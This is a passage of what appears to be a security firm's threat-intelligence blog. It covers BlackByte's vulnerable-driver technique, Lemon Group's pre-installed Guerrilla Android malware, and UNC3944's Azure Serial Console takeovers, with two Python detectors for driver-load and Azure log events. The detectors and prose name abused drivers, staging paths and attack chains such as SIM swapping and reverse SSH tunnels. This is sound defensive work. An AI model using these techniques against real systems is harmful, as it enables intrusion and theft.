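As an added illustration of the behavioral detection recommended above (not code from the BlackByte analysis or from any vendor product), the Python routine below checks Sysmon-style DriverLoad and FileCreate events for the BYOVD indicators described in this article: the two vulnerable driver names, the C:\SystemData staging directory, and drivers loaded from outside the standard driver directories. The events are constructed samples, and the SHA256 values in the blocklist are labelled placeholders, not real hashes; populate them from a trusted source such as the Microsoft vulnerable driver blocklist.

```python
import ntpath

# Vulnerable drivers named in the article. Hash entries are PLACEHOLDERS:
# replace with values from a trusted vulnerable-driver blocklist.
VULN_DRIVER_NAMES = {'rtcore64.sys', 'dbutil_2_3.sys'}
VULN_DRIVER_SHA256 = {'<sha256-placeholder-rtcore64>', '<sha256-placeholder-dbutil>'}
TRUSTED_DRIVER_DIRS = ('c:\\windows\\system32\\drivers\\',
                       'c:\\windows\\system32\\driverstore\\')
STAGING_DIR = 'c:\\systemdata'  # drop directory reported for BlackByte NT

# Constructed Sysmon-style events (ID 6 DriverLoad, ID 11 FileCreate); not real telemetry.
SAMPLE_EVENTS = [
    {'event': 'FileCreate', 'image': r'C:\SystemData\A3V86HEL'},
    {'event': 'DriverLoad', 'image': r'C:\SystemData\A3V86HEL',
     'sha256': '<sha256-placeholder-rtcore64>'},
    {'event': 'DriverLoad', 'image': r'C:\Users\Public\DBUtil_2_3.Sys', 'sha256': 'abc'},
    {'event': 'DriverLoad', 'image': r'C:\Windows\System32\drivers\tcpip.sys', 'sha256': 'def'},
]


def check_event(ev):
    """Return the reasons an event is suspicious (empty list if none)."""
    reasons = []
    low = ev.get('image', '').lower()
    name = ntpath.basename(low)
    if ev.get('event') == 'DriverLoad':
        if name in VULN_DRIVER_NAMES:
            reasons.append(f'known vulnerable driver name {name}')
        if ev.get('sha256', '') in VULN_DRIVER_SHA256:
            # Catches the driver even when it was renamed (A3V86HEL has no .sys name).
            reasons.append('hash matches vulnerable driver blocklist')
        if not low.startswith(TRUSTED_DRIVER_DIRS):
            reasons.append('driver loaded from non-standard directory')
        if not name.endswith('.sys'):
            reasons.append('driver image without .sys extension')
    elif ev.get('event') == 'FileCreate':
        if ntpath.dirname(low) == STAGING_DIR:
            reasons.append('file written to BlackByte NT staging directory')
    return reasons


def scan(events):
    """Return [(image, reasons)] for every event that raised at least one reason."""
    return [(ev['image'], check_event(ev)) for ev in events if check_event(ev)]


if __name__ == '__main__':
    for image, why in scan(SAMPLE_EVENTS):
        print(image, '->', ', '.join(why))
```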


Lemon Group’s Cybercrime Enterprise Leverages Millions of Pre-Infected Android Phones

The Lemon Group, a large cybercrime enterprise, has installed “Guerrilla” malware on approximately 9 million Android-based devices, including smartphones, watches, TVs, and TV boxes.

Techniques such as reflashing and silent installation have become prevalent in the past decade. Reflashing involves reprogramming or replacing the firmware of a device, allowing for modifications, firmware updates, or the installation of different operating systems. Initially used for device customization, these methods were later exploited by threat actors for malicious activities, infecting phones with unwanted apps to profit from pay-per-install schemes. In 2016, reports emerged of Triada malware being implanted in multiple devices. In 2019, Google confirmed cases where third-party vendors had modified original equipment manufacturer (OEM) images without notifying the OEM company. In 2021, researchers discovered the SMS Phone Verified Accounts (PVA) mobile botnet and the criminal operations behind it, which exploited compromised mobile supply chains. They identified the malware responsible as Guerrilla and traced it back to a threat actor group known as the Lemon Group. Researchers observed an overlap between Guerrilla and Triada in communication and network flow, indicating a potential collaboration between the two groups.

Guerrilla malware allows the threat actors to carry out various malicious activities, such as intercepting one-time passwords, setting up reverse proxies, hijacking WhatsApp sessions, and more. The Lemon Group was initially exposed in February 2022 and later rebranded as “Durian Cloud SMS,” but its tactics and infrastructure remained the same. The group’s main business involves utilizing big data for analysis and advertising purposes. It is unclear how Lemon Group infects devices, but possible methods include supply chain attacks, compromised software/firmware updates, or insider involvement. The malware consists of various plugins for specific functions, including intercepting SMS passwords, setting up proxies, hijacking sessions, displaying intrusive ads, and silently installing/uninstalling applications. Lemon Group’s monetization strategy includes selling compromised accounts, hijacking network resources, generating fraudulent ad impressions, and offering proxy and SMS PVA services. The impact of Lemon Group’s operations is global, with millions of infected devices spread across 180 countries, particularly in the United States, Mexico, Indonesia, Thailand, and Russia. The actual count of infected devices could be higher, as some devices have not yet communicated with the attackers’ servers. Researchers detected over 490,000 compromised mobile numbers tied to one-time password requests for various services. The extent of the Lemon Group’s operations indicates its substantial global reach. The threat actor’s activities pose a significant risk to compromised devices and legitimate users, and its malware has been spreading over the past five years.

To mitigate mobile device malware risks, keep software updated, download apps from trusted sources, exercise caution with app permissions, install reputable security software, beware of phishing and malicious links, enable app verification and sandboxing, implement device encryption and strong passwords, regularly back up data, use public Wi-Fi networks cautiously or with a VPN, and stay informed about mobile threats through education and awareness. These measures help protect against known vulnerabilities, malicious apps, phishing attempts, and unauthorized access, enhancing the overall security of mobile devices and safeguarding personal information. 


UNC3944 Exploits Azure Serial Console for Complete VM Takeover

A threat group known as UNC3944 (also known as Roasted 0ktapus and Scattered Spider) has been observed hijacking Microsoft Azure admin accounts through phishing and SIM-swapping attacks. The financially motivated group bypasses traditional detection methods within Azure and gains full administrative access to compromised virtual machines (VMs) within victim organizations using Microsoft’s cloud computing service. They have been active since late last year, primarily targeting telecommunications and business process outsourcing (BPO) companies.

The attackers exploit the Azure Serial Console to install remote management software for persistence and abuse Azure Extensions for stealthy surveillance. Using stolen credentials obtained through SMS phishing, the threat actors impersonate administrators to trick help desk agents into sending a multifactor reset code via SMS. The attackers perform SIM swapping to receive the 2FA token without the victim’s knowledge. Once inside the Azure environment, UNC3944 uses administrator privileges to gather information and to modify or create Azure accounts. They employ Azure Extensions, such as diagnostic features, for surveillance and data gathering. UNC3944 then gains administrative access to VMs through the Azure Serial Console, running commands and using PowerShell to establish persistence and install remote administration tools. Additionally, the group uses a loader called STONESTOP to install a malicious signed driver named POORTRY, enabling them to terminate security software processes in a Bring Your Own Vulnerable Driver (BYOVD) attack. The attackers create a reverse SSH tunnel for persistent access that bypasses network restrictions. Finally, they use compromised user account credentials to log into the compromised VMs and expand control within the breached environment, stealing data along the way.

UNC3944’s attack demonstrates their deep understanding of Azure and their ability to evade detection by leveraging built-in tools. Organizations’ insufficient security measures and limited knowledge of cloud technologies, such as relying on SMS-based multifactor authentication, create opportunities for these sophisticated threat actors. To enhance security, organizations should limit access to remote administration channels and avoid using SMS as a multifactor authentication method whenever feasible. It is advisable to review user account permissions, ensuring they are not excessively permissive, and implement Conditional Access Authentication Strength policies that align with best practices. These measures contribute to a more secure environment and help prevent unauthorized access.
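To complement the access-limiting advice above with detection, here is an added example (not code from the UNC3944 report or from Microsoft) that correlates Azure Activity Log records: it flags a VM when the same caller connects to its serial console and, within a time window, also writes a VM extension or issues a run command on it, which is the tool-installation pattern described above. The records are constructed samples with a subset of the Activity Log fields; the three operation names are real Azure resource-provider operations, and the subscription ID is a placeholder.

```python
from collections import defaultdict
from datetime import datetime

# Azure resource-provider operation names as they appear in the Activity Log.
SERIAL_CONSOLE = 'microsoft.serialconsole/serialports/connect/action'
EXTENSION_WRITE = 'microsoft.compute/virtualmachines/extensions/write'
RUN_COMMAND = 'microsoft.compute/virtualmachines/runcommand/action'
RISKY_OPS = {SERIAL_CONSOLE, EXTENSION_WRITE, RUN_COMMAND}

VM_PREFIX = ('/subscriptions/<sub-id-placeholder>/resourceGroups/rg1/'
             'providers/Microsoft.Compute/virtualMachines/')

# Constructed Activity Log records (not real telemetry).
SAMPLE_RECORDS = [
    {'time': '2023-05-17T10:02:11Z', 'caller': 'admin@contoso.example',
     'op': 'Microsoft.Compute/virtualMachines/extensions/write', 'resource': VM_PREFIX + 'vm-app01'},
    {'time': '2023-05-17T10:09:40Z', 'caller': 'admin@contoso.example',
     'op': 'Microsoft.SerialConsole/serialPorts/connect/action', 'resource': VM_PREFIX + 'vm-app01'},
    {'time': '2023-05-17T10:15:03Z', 'caller': 'admin@contoso.example',
     'op': 'Microsoft.Compute/virtualMachines/runCommand/action', 'resource': VM_PREFIX + 'vm-app01'},
    {'time': '2023-05-17T11:40:00Z', 'caller': 'ops@contoso.example',
     'op': 'Microsoft.Compute/virtualMachines/extensions/write', 'resource': VM_PREFIX + 'vm-db02'},
]


def correlate(records, window_minutes=60):
    """Return [(caller, vm, sorted_ops)] for each caller/VM pair where a serial
    console connection is accompanied by an extension write or run command
    within window_minutes. Records with other operations are ignored."""
    by_key = defaultdict(list)
    for r in records:
        op = r['op'].lower()
        if op not in RISKY_OPS:
            continue
        vm = r['resource'].rsplit('/', 1)[-1].lower()
        ts = datetime.strptime(r['time'], '%Y-%m-%dT%H:%M:%SZ')
        by_key[(r['caller'].lower(), vm)].append((ts, op))
    alerts = []
    for (caller, vm), events in by_key.items():
        console = [t for t, op in events if op == SERIAL_CONSOLE]
        others = [(t, op) for t, op in events if op != SERIAL_CONSOLE]
        hits = {op for ct in console for t, op in others
                if abs((t - ct).total_seconds()) <= window_minutes * 60}
        if hits:
            alerts.append((caller, vm, sorted(hits)))
    return alerts


if __name__ == '__main__':
    for caller, vm, ops in correlate(SAMPLE_RECORDS):
        print(f'{caller} on {vm}: serial console plus {", ".join(ops)}')
```

A lone serial console session by an on-call engineer does not trigger the rule; only the console-plus-tooling combination on the same VM does, which keeps the alert volume manageable while still catching the chain above.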

For Emergency Cyber Security Incident Response please email RedTeam@DefendEdge.com